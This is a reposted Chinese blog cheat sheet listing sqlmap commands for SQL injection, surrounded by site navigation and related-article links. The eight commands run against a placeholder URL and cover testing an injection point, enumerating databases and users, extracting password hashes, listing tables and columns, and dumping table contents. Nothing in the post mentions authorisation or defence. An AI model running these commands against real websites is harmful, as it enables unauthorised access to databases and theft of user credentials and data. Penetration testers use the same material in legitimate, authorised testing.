博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
sqlmap常用注入点检测&爆破命令
阅读量:7209 次
发布时间:2019-06-29

本文共 533 字,大约阅读时间需要 1 分钟。

hot3.png

1、检测注入点是否可用

python sqlmap.py -u "url"
2、从目标url爆破所有数据库名
python sqlmap.py -u "url" --dbs
3、从目标url爆破当前数据库名
python sqlmap.py -u "url" --current-dbs
4、列出数据库所有用户
python sqlmap.py -u "url" --users
5、列出数据库账户密码
python sqlmap.py -u "url" --passwords
6、列出指定数据库的所有表名
python sqlmap.py -u "url" -D databasename --tables
7、列出指定表的所有字段名
python sqlmap.py -u "url" -D databasename -T tablename --columns --hex
8、列出指定字段内容
python sqlmap.py -u "url" -D databasename -T tablename -C columnname --dump

 

参考文献:

转载于:https://my.oschina.net/u/3636678/blog/2872803

你可能感兴趣的文章
React Native 初体验
查看>>
数据结构与算法 | 线性表 —— 链表
查看>>
Python3 websocket通信
查看>>
使用MarkDown画矩阵
查看>>
JavaScript函数式编程学习
查看>>
ESXi6.7安装流程和bug处理
查看>>
Alibaba Cluster Data 开放下载:270GB 数据揭秘你不知道的阿里巴巴数据中心
查看>>
巧用这19条MySQL优化,效率至少提高3倍
查看>>
【译】Swift算法俱乐部-查找最大/最小值
查看>>
跟着老司机玩转Node自定义命令行
查看>>
react-redux的Provider和connect
查看>>
杂七杂八的前端基础01——函数作用域
查看>>
new操作符具体干了啥
查看>>
iOS响应链
查看>>
『中级篇』docker容器安装wordpress(37)
查看>>
设备节点监听--走在 input 分析之前
查看>>
一行代码实现微光效果
查看>>
React Native学习之 ListView 的简单使用
查看>>
Java 8流操作
查看>>
Load和Initialize往死了问是一种怎样的体验?
查看>>
喝酒易醉,品茶养心,人生如梦,品茶悟道,何以解忧?唯有杜康!-- 愿君每日到此一游!
当前时间: 2025-02-14 19:46:50   当前IP: 3.129.250.15   联系邮箱:javaeecc@qq.com     Copyright © 2020 - 2022 baihongyu.com 京ICP备2021015314号-2
强烈建议你试试无所不能的CHAT-GPT,快点击我
强烈建议你试试无所不能的CHAT-GPT,快点击我